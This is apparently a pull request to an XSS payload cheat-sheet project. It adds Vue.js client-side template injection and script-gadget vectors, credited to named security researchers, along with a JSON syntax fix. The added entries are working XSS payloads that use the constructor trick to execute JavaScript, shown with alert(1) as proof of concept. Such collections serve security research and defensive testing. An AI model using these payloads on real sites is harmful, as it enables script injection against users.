### PR TITLE
Adding vue.js specific payloads

### DIFF
--- a/json/vuejs.json
+++ b/json/vuejs.json
@@ -19,7 +19,6 @@
                 "company": "Cure53",
                 "twitterUrl": "https:\/\/twitter.com\/cure53berlin"
             },
-            ,
             {
                 "name": "Script Gadget Research",
                 "company": "Google"

--- a/json/vuejs.json
+++ b/json/vuejs.json
@@ -28,5 +28,18 @@
         "hash": "",
         "type": "reflected",
         "csp": false
+    },
+    {
+        "authors": [
+            {
+                "name": "Gareth Heyes",
+                "company": "PortSwigger",
+                "twitterUrl": "https:\/\/twitter.com\/garethheyes"
+            }
+        ],
+        "vector": "<x v-html=_c.constructor('alert(1)')()>",
+        "hash": "",
+        "type": "reflected",
+        "csp": false
     }
 ]

--- a/json/vuejs.json
+++ b/json/vuejs.json
@@ -1,0 +1,33 @@
+[
+    {
+        "authors": [
+            {
+                "name": "Mario Heiderich",
+                "company": "Cure53",
+                "twitterUrl": "https:\/\/twitter.com\/cure53berlin"
+            }
+        ],
+        "vector": "{{constructor.constructor('alert(1)')()}}",
+        "hash": "",
+        "type": "reflected",
+        "csp": false
+    },
+    {
+        "authors": [
+            {
+                "name": "Mario Heiderich",
+                "company": "Cure53",
+                "twitterUrl": "https:\/\/twitter.com\/cure53berlin"
+            },
+            ,
+            {
+                "name": "Script Gadget Research",
+                "company": "Google"
+            }
+        ],
+        "vector": "<div v-html=\"''.constructor.constructor('alert(1)')()\">a</div>",
+        "hash": "",
+        "type": "reflected",
+        "csp": false
+    }
+]


### PR DESCRIPTION
Adds to the 'AngularJS' type issues where Vue.js also processes expressions and has a script gadget type attack.

Expression: https://jsfiddle.net/odv8yz61/
Script Gadget: https://jsfiddle.net/odv8yz61/1/

Research reference: 
https://github.com/cure53/mustache-security/blob/master/wiki/VueJS.wiki
https://github.com/google/security-research-pocs/blob/master/script-gadgets/bypasses.md

We may want to add more from the google research, lets discuss that!